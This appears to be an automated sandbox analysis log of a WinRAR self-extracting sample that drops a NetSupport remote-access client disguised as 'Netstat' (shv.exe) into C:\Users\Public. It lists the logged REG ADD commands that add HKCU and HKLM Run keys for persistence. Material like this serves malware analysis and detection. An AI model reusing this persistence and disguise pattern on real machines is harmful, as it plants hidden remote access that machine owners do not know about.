                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: file.exeStatic file information: File size 2283788 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000005.00000002.4133157062.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000008.00000002.1694833283.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.1806765097.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.1887019832.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.1968818486.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000005.00000002.4133414083.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000008.00000002.1695153610.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.1807037873.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.1887260588.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.1969045817.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000005.00000002.4133318649.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000008.00000002.1695028330.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.1806911181.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.1887171743.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.1968966209.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_4506265Jump to behavior
                                Source: file.exeStatic PE information: section name: .didat
                                Source: file.exeStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C5156 push rsi; retf 0_2_00007FF6FE1C5157
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C5166 push rsi; retf 0_2_00007FF6FE1C5167
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1116F055 push ecx; ret 8_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11169F49 push ecx; ret 8_2_11169F5C
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11040E01 push 3BFFFFFEh; ret 8_2_11040E06
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\shv.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11127E10
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
